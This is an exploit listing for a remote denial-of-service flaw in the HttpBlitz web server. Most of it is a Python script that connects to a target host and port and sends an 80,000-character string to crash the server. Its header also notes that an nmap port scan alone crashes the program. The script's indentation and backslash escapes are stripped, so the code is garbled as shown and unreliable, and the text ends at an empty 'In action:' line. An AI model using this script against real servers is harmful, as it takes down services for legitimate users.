HttpBlitz Web Server Denial Of Service Exploit

HttpBlitz Web Server Denial Of Service Exploit

HttpBlitz Server is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to cause the application to crash, denying service to legitimate users.

#!/usr/bin/python

# Title: HttpBlitz DOS
# Date: 12/24/2010
# Author: otoy
# Software Link: http://sourceforge.net/projects/httpblitz/files/HttpBlitz.msi/download
# Tested on: Windows XP SP3
#
# ======================================================================
#        ___       _ __        __            __    _     __
#   ____/ (_)___ _(_) /_____ _/ / ___  _____/ /_  (_)___/ /___  ____ _
#  / __  / / __ `/ / __/ __ `/ / / _ / ___/ __ / / __  / __ / __ `/
# / /_/ / / /_/ / / /_/ /_/ / / /  __/ /__/ / / / / /_/ / / / / /_/ /
# __,_/_/__, /_/__/__,_/_/  ___/___/_/ /_/_/__,_/_/ /_/__,_/
#        /____/             http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
#   say hello to all digital-echidna org crew:
#       modpr0be, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
#   special thx to offsec, exploit-db, corelan team
#
#### Software description:
# A cross platform Http web server developed using C++. Agile methodology
# with emphasis on :- 1. Good Design 2. Object Oriented Programming 3.
# Refactoring 4. Static/Dynamic Analysis, Unit-testing, Code Coverage 5.
# Software Engineering best practices.
#
#### DOS information:
# you just have to send long string, and it will crash the program.
# just scan the port using nmap will crash the program too.

import socket, sys
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

junk = "x41" * 80000

def banner():
print "nHttpBlitz DOS."
print "By: otoy (otoy[at]digital-echidna[dot]org)n"

if len(sys.argv)!=3:
banner()
print "Usage: %s <ip> <port>n" %sys.argv[0]
sys.exit(0)

try:
s.connect((sys.argv[1], int(sys.argv[2])))
except:
print "Can't connect to server!n"
sys.exit(0)

s.send(junk+'rn')
s.close()

In action: